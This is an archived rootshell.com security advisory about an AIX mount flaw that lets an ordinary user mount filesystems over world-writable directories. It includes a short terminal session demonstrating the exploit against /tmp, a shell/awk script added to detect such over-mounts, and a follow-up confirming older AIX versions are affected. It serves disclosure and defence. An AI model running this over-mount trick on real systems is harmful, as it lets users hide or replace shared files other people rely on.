[ http://www.rootshell.com/ ]

----------------------------------------------------------------------------

My apologies if this is known already . . . however, I've seen nothing about
it and it does concern me.  I have verified a problem with mount on AIX 4.1.3,
4.1.4, 4.2.0, and 4.2.1 which allows a normal user to mount any filesystem
(including those already mounted by the system) on top of any writable
space.  Immediately, as the script below shows, this allows a user to
overwrite the contents of 777 directories with whatever files one wants.

(e.g. Removing access to temporary files in /tmp) . . .

sapphire /home/rquick > oslevel
4.1.4.0
sapphire /home/rquick > who am i
rquick    pts/2
sapphire /home/rquick > id
uid=20653(rquick) gid=101(comtec)
sapphire /home/rquick > ln -s /tmp mnt
sapphire /home/rquick > mount /usr mnt
sapphire /home/rquick > cd /tmp
sapphire /tmp > ls
OV           dict         include      lpd          sbin         ucb
adm          dt           lbin         lpp          share        usg
bin          ebt          lib          man          spool
ccs          eligibility  local        pub          sys
common       etc          lost+found   samples      tmp
sapphire /tmp > cd
sapphire /home/rquick > umount mnt
sapphire /home/rquick >

I have notified IBM of the problem . . . they have yet to respond.

S. Ryan Quick
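
A detection check for the condition shown in the session above, as an added example that is not part of the original post or any IBM tooling: it scans a mount table for directory-over-directory mounts and for mount points that appear more than once. The column layout, the sample table, and the assumption that the over-mount is listed under the resolved path /tmp are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a mount table for over-mounts like "mount /usr mnt".
# Assumed layout: [node] mounted mounted-over vfs date options,
# with the node column left blank for local mounts.

# Constructed sample modelled on the session above (/usr mounted over /tmp).
SAMPLE_MOUNTS='  node       mounted        mounted over    vfs       date        options
-------- ---------------  ---------------  ------ ------------ ---------------
         /dev/hd4         /                jfs    Mar 20 09:12 rw,log=/dev/hd8
         /dev/hd2         /usr             jfs    Mar 20 09:12 rw,log=/dev/hd8
         /dev/hd3         /tmp             jfs    Mar 20 09:12 rw,log=/dev/hd8
         /usr             /tmp             jfs    Mar 20 14:03 rw'

# Reads a mount table on stdin and prints one finding per line:
#   DIRMOUNT src over dir    local source is a directory, not a /dev device
#   STACKED dir: new hides old    a second mount covers an existing one
audit_mounts() {
    awk '
    NF == 0 || $1 == "node" || $1 ~ /^-+$/ { next }   # blank, header, ruler
    {
        # A local entry has no node column, so field 1 is a path.
        if ($1 ~ /^\//) { src = $1; over = $2; remote = 0 }
        else            { src = $2; over = $3; remote = 1 }

        if (!remote && src !~ /^\/dev\//)
            printf "DIRMOUNT %s over %s\n", src, over

        if (over in first)
            printf "STACKED %s: %s hides %s\n", over, src, first[over]
        else
            first[over] = src
    }'
}

# Run against the constructed sample; on a live host pipe `mount` in instead.
printf '%s\n' "$SAMPLE_MOUNTS" | audit_mounts
```

Directory mounts can be legitimate, so a DIRMOUNT line is a prompt to check who created the mount rather than proof of abuse.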


----------------------------------------------------------------------------

Date: Fri, 20 Mar 1998 20:04:18 +0100 (MEZ)
From: Troeger Gerd <mai95dwy@gingema.rz.uni-leipzig.de>
To: info@rootshell.com
Subject: aix_mount


This one apparently also works on older AIX versions, verified on 3.2.5.0.

regards
-g